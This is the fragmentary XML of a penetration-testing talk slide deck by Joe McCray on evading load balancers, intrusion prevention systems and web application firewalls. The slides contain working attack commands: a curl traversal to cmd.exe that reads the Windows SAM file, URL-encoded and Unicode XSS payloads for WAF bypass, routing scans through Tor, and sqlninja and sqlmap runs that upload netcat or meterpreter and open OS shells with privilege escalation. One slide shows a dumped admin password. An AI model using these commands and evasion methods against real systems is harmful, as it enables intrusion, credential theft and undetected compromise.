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5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0" y="0"/>
            <a:ext cx="2921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3886200" y="0"/>
            <a:ext cx="2921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2640" y="379080"/>
            <a:ext cx="451332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4970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0" y="8651880"/>
            <a:ext cx="2921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84468-6521-4C76-982D-5AC78EC72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FBDA9-5184-44E6-8791-775BA14463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991F4-D5FC-4805-B7AC-3CA101146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0E1D4-B43B-4461-B358-25F2B5FE3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644E0-252E-43FA-8CCE-08B369ACE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4971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AFEE3-922A-432A-9DA5-65813DC60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A796D-2115-4642-9331-ECB16D4F2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BAC96-C912-4110-8D11-1D6F243DB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4F66C-7C96-4CEB-9C34-8E94A4120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18849-E9DA-4C27-94CE-5A0EDA4165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1658E-F618-4B68-BCC8-18117CC03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A4F20-3A4B-4FCD-B9B1-E59FE599A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EB1FE-2B0A-4C2B-8FB2-7C977B539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5D1C9-64A8-45DC-BFC6-14929BD18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065FA-B06F-41D4-8C73-4E12BBDA4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B74EF-E7BE-40E1-95A3-C60069715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B08AA-8754-4270-BBF0-E23C7D7AD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04286-A392-4CA6-990D-822A736D0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FA45F-CA78-4BED-9369-B45F6EAB6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3D6EF-1C93-4ABB-800A-E163CBA3E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E83FF-0354-4886-BE0C-8957110B5B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AFE44-3579-43C9-BEA3-5E41AFC62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39EC4-C189-4EFA-A392-8FBD45FB7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FE410-94F9-4CFA-858F-8DC000D77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07F0F-D74D-48F7-8C1B-2AC47E455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03B3C-755D-4920-9156-D6ACAA5E4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A7F58-D663-46B6-A6FD-8006F808B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4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09976-5963-401A-9919-337FDF6B6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86360" cy="410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63FE2-0918-4D95-AFBC-CA056FE48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9CBE6-3B2C-4117-A470-FC1019AD38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31287-65B4-4682-8A40-4C0C5175D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01ADD-ACD5-45E7-82C7-686F38BAD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9F9A0-184D-48BA-B2B6-AC5C50114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4D773-84A1-49FB-9B7A-87EF7D652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9F620-D434-4520-A430-D1737E08A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9322B-2467-438F-9125-8BB10F331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5397D-6704-452B-83FB-D795D3462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F8678-AC7A-4397-9286-BF28C1503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30E24-6706-4052-A94F-2F67B6FA7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B2EC2-0840-4320-847A-F805A7A565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81FD4-4527-4FE2-8B51-33874E427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DC800-03FF-4D11-A05A-B02AE7475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E7240-B730-4527-8093-6FDC9581B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9772B-5D01-4EF9-90BF-AD2497CCF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7E473-CAC3-44DE-9AF5-16F5FD419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7CF8A-6FA0-4210-8C0C-3D9F1051E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79EBC-21F3-481C-80A6-A441E7AD48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3295F-ADEC-4EFE-9B75-8D606227F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68955-CB54-46F0-BA8C-4AA5131C9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F4298-BDA0-4C2D-9EBD-51E6B899C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1315A-6D98-4F01-B19C-49961CD98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E66BF-5608-4D4E-A0F7-8AA8CAAE79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231F4-B1A6-46C1-879D-79732D5243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50D3E-7A8A-438B-9575-FED9DEE1D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09FA7-7E96-46EF-83A7-C9D641C9F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8402C-9F4C-4757-85F0-A75A7486A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97F91-25B8-46A5-8854-2A123CF88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11876-1193-41D5-9FA4-90DFC047E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E2E19-EDD9-4E78-89EB-EDC208242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7608F-9545-46B3-B798-3564918F2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5A2AE-2EA6-4BF7-AAAB-78F9819CB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F5753-1741-429C-A577-039E04432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D4F88-4319-4589-81FA-8BDFA8ECF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C4F4F-0318-4CCD-AF92-25C1EA0A8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C31DD-1C1B-4679-9B3B-F5DF2F244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4C1F3-AE95-45EF-9D5D-B06F16375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682C1-BD21-4F7D-ACDA-94461C6BE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27A07-F56E-482A-AFA6-B3F228CA4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1B47D-9B22-4AAC-8B1C-FCB74887F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52ED5-EB05-42D8-AB4B-55C79E668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91780-F150-4386-A845-DFECA380AF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C9790-103C-43FB-8DC6-0217E085D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1F23F-6131-40E8-9EF0-59C72F528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6BFDC-0413-4942-8A79-3B28133906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4648B-7C88-465E-BE28-E2AA3D924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5F835-65AA-4165-BFC1-490FDB0155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9F4F2-29E9-49E6-A808-476E577A15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1CE1D-760A-4BC9-9875-AE4B4F7CA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0D94E-12C2-4B83-864E-F87B2D8CDC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461DF-62C3-4A4B-9758-057D85239E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8D830-5D36-49E2-BC36-AE4C78741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B041F-F696-4BB5-92FB-18AB950C7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87CC3-EF29-4D4D-A428-2BAB54F18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8846F-913A-488B-ADBD-EE51FB1A1D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2B837-D9F3-4942-A71B-C08C5A6FB5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41584-CB46-42EA-80C1-B3C9D791C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60A54-1D4D-488D-A305-4FD9E52BE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12745-9A59-4BCB-80F5-8E070CEB8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9309F-0BF1-4FE4-9474-4569EBC305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1D1BA-5566-4990-8BC6-8405FD2DBE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7339D-89B2-49C9-9B31-A5308C03D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0984E-827A-4C8D-A64D-2A308F16B7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44583-8CEA-45BF-991F-4CF25EAE6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EDB59-F3CE-49DB-9A73-2B7DF0DDF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77EB0-309B-4C8C-9527-2602A7C8A4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E001F-E31A-49E7-BCAA-10B6ACCC0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8BB9E-73ED-4951-8BD9-AFF0682F82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00ADC-1560-401A-A1EE-FFE2C14CA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02526-0255-4AEA-BC35-6A225C4EC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F5D60-B57E-4FA8-ADE1-99AF535F4D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21C87-50FD-478A-B22A-1E596A647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22DE0-8BEF-4A99-B85B-943224D73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3C260-2048-4F31-AA35-FA2AFB3373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C1D24-5CE3-45B7-9D5E-C0C55037B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11720-3677-455F-B4FF-B20C33325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8543D-EF62-40F1-8DA2-6A6741985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7E9F3-31BF-42ED-BEB4-1F01B773A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638CA-2FE1-449B-929E-68F29A894C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30E6A-6D6C-4924-B301-C07F078E6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59100-EA20-48A6-95A8-86FE66EE4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C8CF9-D0A3-4E2F-8F6D-FDCBC3091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47643-BBBF-4D52-A1FB-3DAA3EEEE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AE170-BA4B-472C-84F2-5E405F43A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18EC8-2356-4C60-B41A-59B629063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50CB4-94E0-4CEB-AECD-22DFB7F8E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C133F-2F05-4998-9D06-AD08F29B8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7AB98-64BD-49DC-91DF-B4A0FE270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ACCCA-824C-4506-B235-291BBD18E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5AA40-72D9-4068-927B-9F0E09660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9DEC1-E83C-4F5C-A33D-63424516A7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56683-7ACC-4A91-BB09-309B85237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44E40-6D41-46BB-A01D-500698CF8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A459C-543C-42E6-BE3E-B77BBC0DF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9FC92-1D85-48AC-A278-496E08C18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C3AA3-1C1D-4E1A-A749-790CD6B371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B9128-ACA1-46C4-B447-D1640FB3C2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EE5D0-1FAB-4451-B537-FF371D6E1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73D06-B778-4B84-9493-0FA44DA24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8F87D-74A6-4551-88F1-96671F40C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B6A95-B506-4005-893D-29187B20E8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36B73-3A29-462C-AAC1-537B550D9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A4271-0A63-494D-89ED-DC00E68FD1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2A1F6-6F70-427F-9EE8-EEC4825E7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0B1BB-16EC-424C-91A9-533C7A1792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B4FB8-A2CD-48BA-A585-2CED86263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D1AF5-19F8-4A0B-95E6-60C874610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23BCE-419E-4D76-96C2-7A8D2F71C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794BF-C0BE-4355-BD14-E87233B03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3BF39-D7F5-4D53-ACB2-845701533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D405B-7229-420E-B269-7DE640170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5615A-9D35-410F-B8A2-20CDE1786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529CB-8B82-41E8-AAFB-EF9DB8881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39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6FC47-2C61-4EC3-89D6-B5BDAFCAD4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1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51D9A-1070-4B20-887C-0DC824AAA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497844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07338-9EF6-492F-8BFE-421232F20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2C36C-3D23-44A8-A0B7-93CCD4D2B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F6479-0704-4B77-A8AF-2125E5F631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92AC7-32FD-4E9B-B75B-06F90D59C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878E8-0065-40A7-87B1-42B94C560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E1731-C8F1-4E62-B5B4-39F28B49D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9ECCE-AA9D-4628-9799-59A4DBEFA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C199C-B599-4D92-A4E0-2AE545F3B6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B5789-FE96-47FF-AF5F-043AD3881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2D8B3-AA5A-4B19-913F-B9629F020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DE1D3-C2EB-46B5-86DA-580C8D3E0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2BEDF-0B2B-49A9-8B3B-F484DF986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4A11D-CDEE-47BE-9792-8215E1369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BFDE3-CD6E-4BD3-8AF0-38BCE6D9F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B4E60-BE1F-4142-B573-58C0BCEEB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4FDFB-B606-42B4-B8AA-6186D679B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2AEEC-F484-4753-88FD-ED60FDBBD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2A7C6-5BA5-419D-AC37-1A8E4D817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51A16-8D2E-40B1-ADE1-6F0212F42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68548-3ECA-4CD8-AF71-BF879D7A3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D529F-2BEF-409D-B74B-65D0AE6CF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2DD02-BD9B-4986-A95D-18F84232A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649C3-1691-4A8D-A488-5C075FAAA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80BA1-B99E-48F0-87B1-17E996E0B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6C1E3-77A9-407C-BDE2-2088B597E4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DF2C1-B382-4174-82BD-2D380CA3B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9EFC5-4B3F-46A9-AF0B-F109C57D2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3E83F-4C8F-4272-BDCA-4EB0BCED4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0B5E4-3056-484C-9E3D-D9885D8BA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794B9-A342-4B37-BE6A-97C15CE32D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9C164-43AA-420A-8858-AAA7105F5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BC042-9796-417A-B585-76905BA34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AC9D2-BC3A-4B32-BD4F-A7B94245A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59B58-FC07-4831-98D3-34E758FAC1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B7738-7C0D-498E-ACD1-69AE360F0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559B3-8376-4730-AF58-0A2BEEA6B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1A164-35A1-496F-8363-E993FDF284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5B1F2-E304-4D93-A906-66437EEB3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FFE16-3B8D-41F0-A61A-A8CFC4653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D1C0D-A25D-4208-A5B0-02397D613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97F7F-47D6-4C88-8273-92C7AACF6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51F06-6725-43DA-BBDF-D1C59D271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35BA7-C42F-4D9C-B5A5-9403DA518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5E1A5-03AC-4FFB-8FCB-5F6A0AF1EF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2082E-1377-4345-93CA-5088D76566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EE01-9D63-4B64-A8F9-32D97ACE0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4D9A2-8289-4FBD-AACE-3139383C0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98E2A-FF40-4680-88C5-C6476490A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7B757-9E04-4858-AA32-0069557EE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38D61-0AA8-499A-8B71-8BC8164BB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7719E-2DA1-4DCF-A07B-0C4F38A2B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51032-1A3A-4EF8-9384-A93EC4A19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1AAF7-60C5-44DE-8DDA-324A9E293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body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914040" y="4338360"/>
            <a:ext cx="4971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6481F-F7B7-4621-AADA-00E5D57736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43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C78B3-FB41-4507-8F05-0059ED0A9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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3886200" y="8686800"/>
            <a:ext cx="2914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FD1FA-10F7-4AC0-920A-E351BA4B8A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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3886200" y="8686800"/>
            <a:ext cx="2919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620F6-0718-4657-9158-B50ACA7FA9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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3886200" y="8686800"/>
            <a:ext cx="2921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86681-8137-420F-8F8F-C4F9896F1B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DAACF-7DA0-43DC-B6B2-BC52290CA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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3886200" y="8686800"/>
            <a:ext cx="2913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01EBB-DD0F-426B-BD0E-F306E6EFD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914400" y="4338720"/>
            <a:ext cx="499752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4ABE-ED52-47FC-B2E1-69C75DF67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488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E2B3-3D3A-4833-861C-83C435EEF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16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8D66-A2F5-49DC-A50B-B9000E692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704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60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704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60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6DDF-1A19-4D14-89A1-683F0CD2C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0C24E-E6E1-410F-AD0F-D05C2C8E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11649-D9C2-47C4-AC15-E0527278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7F6D7-0BDD-4FBA-9504-5AE63533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0D1DB-E918-47EB-9AAD-B586BDA6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B81BE-83ED-4A21-B4C7-51938353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1932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9C6D2-4C32-45AB-B3DA-282AA6FA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518B1-F2BB-4F6D-8445-3C051F2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52FF-CC3D-40E8-9EE8-723C54CF9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516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C0A67-2094-4420-BBD3-EAC143E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03C50-7160-4EE9-B49D-D6E5948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4488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F547F-83F9-4B7C-979A-DCAB2060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516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68770-014C-4852-87F2-70FDF122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704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7600" y="159984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704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7600" y="394488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C742F-99F4-4AE7-9D11-4AB666C9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0C27-84EA-4D6B-91F2-C728B39B8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EE4F-24EF-4EC3-8751-FCEB108A1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958C-D6C8-4148-84C8-16F64C681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19324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87B4-3A5A-4024-8B51-CABBD5FE5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BABB-F22F-4F89-AE09-BBC3D1799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160" y="394488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7F09-BB3D-4BF9-9162-1F54982F8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160" y="159984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488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492C-F2C7-4301-9907-7F24D19F2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6360" indent="-30636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4912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67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20973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DC4ED-EB5A-4AAD-AE3B-DC5B26F726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57200" y="6245280"/>
            <a:ext cx="21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4080" y="6245280"/>
            <a:ext cx="2867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932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6360" indent="-30636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4912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00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8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3720" y="6245280"/>
            <a:ext cx="2862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8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00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A24FA-8E61-4C92-934B-0400DFDE92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871560" y="851040"/>
            <a:ext cx="7196040" cy="5087880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="f2f2f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769080" cy="3773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85800" y="19051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You Spent All That Mone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...And You Still Got Ow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057400" y="3581280"/>
            <a:ext cx="5334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esented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Joe McC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joe@learnsecurityonlin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http://www.linkedin.com/in/joemcc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http://twitter.com/j0emcc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3429000" y="582480"/>
            <a:ext cx="194472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Own the boxes and take screen-shots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228600" y="2066760"/>
            <a:ext cx="4114800" cy="341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4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4875120" y="2286000"/>
            <a:ext cx="3811680" cy="4019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5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="541440" y="3200400"/>
            <a:ext cx="3801960" cy="3295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6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3206880" y="3886200"/>
            <a:ext cx="547992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0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Write The Report...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3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295280" y="2039760"/>
            <a:ext cx="662940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1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Get Paid....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6629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228600" y="228600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More Security Measures are being implemented on company network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Firewalls are common place (perimeter and host-bas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Anti-Virus is smarter (removes popular hacker tools, and in some cases stops buffer overflo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Intrusion Detection/Prevention Systems are hard to detect let alone byp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NAC Solutions are making their way into net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Network/System Administrators are much more security consci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IT Hardware/Software vendors are integrating security into their SD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2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8458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Geez...That's A Lot To By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228600" y="19051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Google loves SQL Inj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Microsoft OLE DB Provider for SQL Server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Microsoft JET Database Engin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Type mismatch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You have an error in your SQL syntax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Invalid SQL statement or JDBC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DorisDuke error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OleDbException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JasperException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Fatal Error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supplied argument is not a valid MySQ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mysql_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ODB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JDB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ORA-009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ADO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3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8458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sk Google To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228600" y="19051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Google loves RF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file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folder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path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style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template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PHP_PATH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doc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document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document_root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pg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* site:targetcompany.com ".php" "pdf=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3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371600"/>
            <a:ext cx="8458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sk Google To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152280" y="205740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ct like a woman trying to catch her man cheating – look through EVEYTHING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Firefox Passive Rec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s://addons.mozilla.org/en-US/firefox/addon/61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1. DNS – AS – Server Version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2. Email addr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3. Files (Doc,PDF,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altego (Data Relationship Identific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www.paterva.com/web5/client/overview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1. DNS – AS – Server Version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2. Email addr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3. Files (Doc,PDF, e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4.  Social Me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5. Too much to list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4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Do Passive Recon/OS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152280" y="2286000"/>
            <a:ext cx="8839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Most load-balancers are deployed for redundancy and performance improv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s an attacker – load balancers are a headach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You have no idea where you packets are going.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There is absolutely no point in running tools against a host without knowing if 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load balancer has been deploy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o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ep 1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Determine if the host is load balanced.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ep 2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Determine what type of load balancing is in place (HTTP or DNS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5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Identifying Load Balanc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152280" y="2286000"/>
            <a:ext cx="8839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tell if the target host is behind a load balanc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Firefox LiveHTTP Hea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s://addons.mozilla.org/en-US/firefox/addon/38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Look in HTTP header for modifications such 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1. BIGipServerOS in cook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2. nnCoection: cl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3. Cneonction: cl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Look for multiple addresses resolving to one domain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dig google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5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Identifying Load Balanc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152280" y="2286000"/>
            <a:ext cx="88394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tell if the target host is behind a load balanc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Netcraf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Look for things like "F5 BigIP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lbd.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ge.mine.nu/lbd.html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sh lbd-0.1.sh targetcompany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albe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halberd.superadditive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* halberd -v targetcompany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6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Identifying Load Balanc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8" descr=":::Picture 2.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="3276720"/>
            <a:ext cx="7620120" cy="1269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Y:\Desktop\Screenshot.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181480" y="4952880"/>
            <a:ext cx="342900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228600" y="251460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5200" indent="-565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  <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>A Network/Web Application Penetration Tester &amp; Tr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.K.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The black guy at security con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5200"/>
                <a:tab algn="l" pos="1022400"/>
                <a:tab algn="l" pos="1479600"/>
                <a:tab algn="l" pos="1936800"/>
                <a:tab algn="l" pos="2394000"/>
                <a:tab algn="l" pos="2851200"/>
                <a:tab algn="l" pos="3308400"/>
                <a:tab algn="l" pos="3765600"/>
                <a:tab algn="l" pos="4222800"/>
                <a:tab algn="l" pos="4680000"/>
                <a:tab algn="l" pos="5137200"/>
                <a:tab algn="l" pos="5594400"/>
                <a:tab algn="l" pos="6051600"/>
                <a:tab algn="l" pos="6508800"/>
                <a:tab algn="l" pos="6966000"/>
                <a:tab algn="l" pos="7423200"/>
                <a:tab algn="l" pos="7880400"/>
                <a:tab algn="l" pos="8337600"/>
                <a:tab algn="l" pos="8794800"/>
                <a:tab algn="l" pos="9252000"/>
                <a:tab algn="l" pos="9709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3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46200"/>
            <a:ext cx="88394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Joe McCray.... Who the heck are you?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152280" y="228600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Ok – so now you've figured out if you are up against a load balanc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You've figured out if it's HTTP or DNS based load balancing and what the real IP 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Just like there's no point in running tools against a load balanced host there is no poi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in running tools against a host that is protected by an I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ooooo...how can you tell if the target host protected an Intrusion Prevention System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7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152280" y="228600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tell if the target host protected an Intrusion Prevention System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url: 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The netcat of the web app wor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2db9"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://curl.haxx.se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url -i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http://www.targetcompany.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2d2db9"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>../../WINNT/system32/cmd.exe?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url -i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http://www.targetcompany.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="2d2db9"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>type+c:\winnt\repair\sam.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Look for RSTs and no response....tcpdump/wireshark is your friend ;-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ctive Filter Det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www.purehacking.com/afd/downloads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- osstmm-afd -P HTTP -t targetcompany.com -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8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152280" y="228600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Ok, so you're up against an IPS – relax...there are a few other things to consi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IN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Most IDS/IPS solutions don't monitor SSL encrypted (actually any encrypted) traff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SL Accelerators are expensive so not everyone has on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8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228600" y="22860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Most of the time you can get around an IPS by just using encry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The other thing to consider is whether the IPS is in-line or out of ban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29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152280" y="2057400"/>
            <a:ext cx="8839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Does the IPS monitor SSL encrypted traffic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 /etc/xinetd.d/ssl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#default: o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#description: OpenSSL s_client proxy (just change the target url)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ar-SA" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="4c4c4c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ice kerbe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disable = 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ocket_type = stre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port =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888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wait = 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protocol = tc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user = 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 =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/home/j0e/security/toolz/ssl_proxy.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only_from =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127.0.0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bind =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127.0.0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0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152280" y="205740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Does the IPS monitor SSL encrypted traffic? (Cont.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 /home/j0e/security/toolz/ssl_proxy.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#!/bin/ba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openssl s_client -quiet -connect www.targetcompany.com:443 2&gt;/dev/null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tart the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/usr/sbin/xinetd -d -f /etc/xinetd.d/ssltest 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Run AFD against localho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osstmm-afd -v -P HTTP -t localhost -p 8888 -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10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Intrusion Preven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228600" y="2057400"/>
            <a:ext cx="883908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To run scanning tools through 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ias hide='su -c "/home/j0e/dumbscripts/hide.sh"'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$ cat /home/j0e/dumbscripts/hide.s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!/bin/ba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tartup privo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/usr/sbin/privoxy /etc/privoxy/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tart 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/usr/bin/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$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hide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ocat TCP4-LISTEN:8080,fork SOCKS4:127.0.0.1:targetcompany.com80,socksport=9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Now all attacks can be launched against 127.0.0.1:8080 with Nessus or similar to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1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ttacking Through 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2286000"/>
            <a:ext cx="906768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What if you don't detect any active filtering solution in plac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an you still be missing something that messing with your traffic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What about a WAF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Most hosts running a WAF will show as not have an Active Filtering Solution in place by tools like AF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2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re We Forgetting Something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*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https://addons.mozilla.org/en-US/firefox/addon/382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* Look in HTTP header for modifications such a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1. Cookie Value has WAF info in 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- BIGipServerwww.google.com_pool_htt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- barra_counter_s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- WODS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2. Different server response code for hostile requ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- 501 Method Not Implemen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3. Different "Server" response when hostile packet is s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3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152280" y="2286000"/>
            <a:ext cx="8839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WAFs are surprisingly easy to detect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Generally you just have to send 1 valid request, and one malicious request and diff the respons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Malicious tends to be any HTTP request that has a payload that contains things lik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'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&lt;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#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|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3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22860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Arial"/>
              </a:rPr>
              <a:t>I H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Arial"/>
              </a:rPr>
              <a:t>I C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Arial"/>
              </a:rPr>
              <a:t>I DRINK (Rum &amp; Cok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4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How I Throw Down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152280" y="2057400"/>
            <a:ext cx="8839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http://targetcompany.com/cmd.exe | grep "501 Method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Netc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4c4c4c"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>$ (echo "GET /cmd.exe HTTP/1.1"; echo "Host: targetcompany.com"; echo) | nc targetcompany.com  | grep "501 Method Not Implemented"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100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="4c4c4c"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>If the server responds with error code “</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff3333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>501 Method Not Implemented</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1100" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="4c4c4c"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>” then it is running mod_security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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://www.targetcompany.com/</a:t>
            </a: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%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HTTP/1.1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999 No Hack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: WWW Server/1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4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3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3886200" y="43434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228600" y="22860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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://www.targetcompany.com/</a:t>
            </a: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%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: Ap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Location: http://www.targetcompany.com/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5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8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="3978360"/>
            <a:ext cx="4114800" cy="15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228600" y="223992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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="595959"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://www.targetcompany.com/</a:t>
            </a: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3c%73%63%72%69%70%74%3e%61%6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%65%72%74%28%27%58%53%53%27%29%3c%2f%73%63%72%69%70%74%3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3333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>HTTP/1.1 200 Condition Intercep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Date: Sun, 15 Mar 2009 01:42:01 GM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: Ap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6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228600" y="22860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affit (WAFWOO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6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dentify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9" descr=":::Picture 1.png"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304920" y="3124080"/>
            <a:ext cx="86104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1407960"/>
            <a:ext cx="9144000" cy="511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228600" y="22860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How can you determine if the target host has deployed a WA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Gary O'Leary-Stee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2d2db9"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://packetstormsecurity.org/web/unicode-fun.t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[j0e@LinuxLaptop toolz]$ ruby unicode-fun.r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Enter string to URL Unicode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:&lt;script&gt;alert('XSS')&lt;/scrip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%u003c%uff53%uff43%uff52%uff49%uff50%uff54%u003e%uff41%uff4c%uff45%uff52%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54%uff08%u02b9%uff38%uff33%uff33%u02b9%uff09%u003c%u2215%uff53%uff43%uff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%uff49%uff50%uff54%u003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u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curl -i </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>http://www.targetcompany.com/</a:t>
            </a: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3c%73%63%72%69%70%74%3e%61%6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2d2db9"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>%65%72%74%28%27%58%53%53%27%29%3c%2f%73%63%72%69%70%74%3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HTTP/1.1 404 Not Fou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Date: Sat, 14 Mar 2009 19:13:10 GM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Server: Ap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7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ypassing Web Application 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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2286000"/>
            <a:ext cx="88390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ias hide='su -c "/home/j0e/dumbscripts/hide.sh"'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$ cat /home/j0e/dumbscripts/hide.s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!/bin/ba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tartup privo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/usr/sbin/privoxy /etc/privoxy/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# Start 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/usr/bin/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$ hide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Firefox Tor But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* </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>https://addons.mozilla.org/en-US/firefox/addon/227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lick on Firefox TOR button and have fun hac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8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Attacking Websites Through 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89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7" descr="dotNetDefenderBlock.JPG"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2133720"/>
            <a:ext cx="7696080" cy="4572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DotNet Defender W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396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8" descr="dotNetDefenderBypass.JPG"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="2362320"/>
            <a:ext cx="6629400" cy="426708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ypassing DotNet Def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03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DotNet Def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11" descr="lol_highmark3.JPG"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2209680"/>
            <a:ext cx="815328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10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Dumping Admin PW – sorry DotNet Def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7" descr="lol_highmark5.JPG"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="2209680"/>
            <a:ext cx="84582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57200" y="1981080"/>
            <a:ext cx="82296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Remembering the good old days.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Identifying Hacker Headach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Load Balanc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Intrusion Prevention Systems (IPSs)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Web Application Firewalls (WAFs)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Network Access Control (NA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Dealing with the Roadbl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Intrusion Prevention Systems (IPSs)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Web Application Firewalls (WAFs)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Network Access Control (NA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Arial"/>
              </a:rPr>
              <a:t>Playing with Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="ar-SA" sz="14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Piv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5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228600" y="22860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1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Getting Into The LAN from the web.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228600" y="20574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d /home/beatdown/toolz/sqlninja-0.2.3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vi sqlninja.beatdown.con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host = [target ip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page = /vuln/vulnpage.as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tringstart = VulnID=1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lhost = [your ip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device = eth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msfpath = /home/beatdown/toolz/metasplo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esolvedip = [your ip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/sqlninja -m t -f sqlninja.beatdown.conf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(test for injecti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/sqlninja -m f -f sqlninja.beatdown.conf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(fingerprint the backend d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/sqlninja -m u -f sqlninja.beatdown.conf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(upload dnstun, netcat, or meterpre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/sqlninja -m s -f sqlninja.beatdown.conf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(drop a shel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2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SQL Injection to Metasploit (SQLNinj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228600" y="20574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d /home/beatdown/toolz/sqlmap-de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python sqlmap.py -u "http://www.about2bowned.com/vuln/vulnpage.aspx?VulnID=10" --os-shell -v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os-shell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python sqlmap.py -u "http://www.about2bowned.com/vuln/vulnpage.aspx?VulnID=10" --os-pwn --msf-path /home/beatdown/toolz/metasploit --priv-esc -v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meterpre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SQL Injection to Metasploit (SQLM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3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Not Getting Ca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8" descr="Tiger-Woods-Mistresses-298x300.jpg"/>
          <p:cNvPicPr/>
          <p:nvPr/>
